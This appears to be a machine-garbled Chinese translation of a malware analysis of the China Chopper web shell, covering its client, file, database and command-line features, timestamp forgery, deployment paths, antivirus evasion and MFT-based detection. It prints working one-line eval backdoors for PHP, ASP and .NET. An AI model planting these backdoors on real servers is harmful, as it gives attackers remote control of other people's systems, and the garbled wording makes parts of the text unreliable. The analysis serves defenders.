Web Shell客户端

中国菜刀的客户端可在www.maicaidao.com下载到。

Web shell (CnC) Client MD5 caidao.exe 5001ef50c7e869253a7c152a638eab8a

注:这里可以对你的下载菜单的MD5值是否相同,如果不同则有可能加了后门或者捆绑了木马。

jsp菜刀shell平安技能十年夜黑客对象之中国菜刀Chopper React

客户端利用UPX加壳,有220672个字节大小,如图1所示:

利用脱壳工具脱壳,可以看到一些隐蔽的细节:

C:Documents and SettingsAdministratorDesktop>upx -d 5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exeUltimate Packer for eXecutablesCopyright (C) 1996 - 2011 UPX 3.08w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011 File size Ratio Format Name -------------------- ------ ----------- ----------- 700416 <- 220672 31.51% win32/pe decomp.exe Unpacked 1 file.

利用PEID(一个免费检测软件利用的加壳手腕的工具),我们可以看到解压缩后的客户端程序利用Visual C + + 6.0编写,如图2所示:

由于字符串没有进行编码,以是可以通过打印输出该后门如何通信,我们可以看到一个url google.com.hk(图3),以及参考文本Chopper(图4)。

打开中国菜刀界面,我们可以看到该工具是一款图形界面临象,并且供应了添加自己的目标、管理的功能,在客户端软件上,右键单击选择“添加”,输入IP地址,以及密码和编码办法,如图5所示:

做事端payload组件

中国菜刀的工具是一款Webshell管理工具,相应一定有一个做事真个程序,它支持各种措辞,如ASP、ASPX、PHP、JSP、CFM,一些官网下载原始程序MD5 HASH如下:

Web shell Payload MD5 Hash Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08 Customize.cfm ad8288227240477a95fb023551773c84 Customize.jsp acba8115d027529763ea5c7ed6621499

例子如下:

PHP: <?php @eval($_POST['pass']);?> ASP: <%eval request(\"大众pass\公众)%> .NET: <%@ Page Language=\"大众Jscript\公众%><%eval(Request.Item[\"大众pass\"大众],\公众unsafe\"大众);%>

在实际利用过程中,更换PASS为链接的时候须要的密码。

功能

上面大略先容了中国菜刀的客户端和做事真个,下面来先容下该款工具的其他功能,中国菜刀包含了“安全扫描”功能,攻击者能够利用爬虫或暴力破解来攻击目标站点,如下图:

在除了创造漏洞之外,中国菜刀最强大的莫过于管理功能了,包含以下内容:

文件管理(文件资源管理器)数据库管理(DB客户端)虚拟终端(命令行)

在中国菜刀的客户端界面中,右键单击一个目标可以查看相应的功能列表,如图7:

文件管理

中国菜刀作为一个远程访问工具(RAT),包含了常见的上传、下载、编辑、删除、复制、重命名以及改变文件的韶光戳。
如图8:

修正文件功能现在常见的webshell就带了该功能,图9显示了测试目录的三个文件,由于Windows资源管理器只显示“修正日期”字段,以是常日情形下,能够达到隐蔽操作的目的。

利用工具将文件修正和其他两个文件相同,如图10,可以看到文件的修正的日期和其他两个文件同等,如果不是专业的人士,一样平常不会看出这几个文件的差异:

当文件的创建日期和修正日期被修正之后,查出非常文件非常麻烦,须要剖析主文件表MFT以及FTK,fireeye建议利用工具mftdump来进行剖析,该工具能够提取文件元数据进行剖析。

下表显示了从MFT中提取的Webshell韶光戳,把稳”fn”字段包含了文件的原始韶光。

Category Pre-touch match Post-touch match siCreateTime (UTC) 6/6/2013 16:01 2/21/2003 22:48 siAccessTime (UTC) 6/20/2013 1:41 6/25/2013 18:56 siModTime (UTC) 6/7/2013 0:33 2/21/2003 22:48 siMFTModTime (UTC) 6/20/2013 1:54 6/25/2013 18:56 fnCreateTime (UTC) 6/6/2013 16:01 6/6/2013 16:01 fnAccessTime (UTC) 6/6/2013 16:03 6/6/2013 16:03 fnModTime (UTC) 6/4/2013 15:42 6/4/2013 15:42 fnMFTModTime (UTC) 6/6/2013 16:04 6/6/2013 16:04

数据库管理

中国菜刀支持各种数据库,如MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等,数据库操作界面,内置了一些常用的数据库语句,能够自动显示表名、列名,查询语句,并且内置了常用的数据库语句。
如下图11:

链接之后,菜刀供应了一些常见的数据库语句,如图12:

命令行功能

末了,菜刀供应了一个命令行界面,能够通过命令行shell进行操作系统级别的互动,当然继续的权限是WEB运用的权限。
如图13:

Payload属性

除了以上的功能之外,中国菜刀的能够在黑客圈广泛利用,还有以下几个成分:

大小做事端内容客户端内容是否免杀

大小

中国菜刀的做事端脚本非常小,是范例的一句话木马,个中aspx做事端软件只有73字节,见图14,比较其他传统的webshell可见它的优胜性。

做事端内容

中国菜刀的做事端代码除了简洁之外,并且支持多种加密、编码。

客户端内容

在浏览器不会产生任何客户端代码,如图16:

杀毒软件检测:

大多数杀毒软件不能检测出该工具。
如下图:

在第一部门份的菜刀阐发里面,已经先容了“中国菜刀”的易用界面以及一些高等特性。
——个中最令人瞩目的,莫过于其作为web shell的大小,aspx版仅有73字节,在硬盘中才4k。
而在这部分里,将会详细“中国菜刀”平台适用性、上传机制、通讯模式以及如何侦测,至于中国菜刀一贯在辩论的一个话题,有没有后门,各位基友,您看了就知道了。

平台:

web做事器平台——JSP, ASP, ASPX, PHP, 或 CFM。
同时在Windows和Linux适用。
在系列一的剖析里面已经展示过“中国菜刀”在windows 2003 IIS 中运行ASPX的情形。
在这一部分里,讲展示运行在Linux平台下的PHP情形。
如下图所示,PHP版本的内容极其精简。

依赖与不同的平台,“中国菜刀”有不同的可选项。
下图显示了在Linux平台下的文件管理特性,(类似于Windows)

上传机制:

由于它的大小,格式,以及大略的payload,“中国菜刀”的传输机制可以很灵巧多样。
以下任意一种方法都可以进行传输:

通过WebDAV文件上传通过JBoss jmx-console 或者Apache的Tomcat管理页面上传远程代码实行下载通过其他办法接入后传输

通讯剖析:

我们已经看过它在做事器真个payload以及掌握web shell的客户端。
接下来,我们检讨一下“中国菜刀”的通讯网络流量。
我们通过抓包软件,剖析其做事端和客户真个通讯情形。

利用抓包软件Wireshark的“follow the TCP”功能可以看到全体TCP数据交互过程。

喜好信息安全的朋友,可以关注和收藏。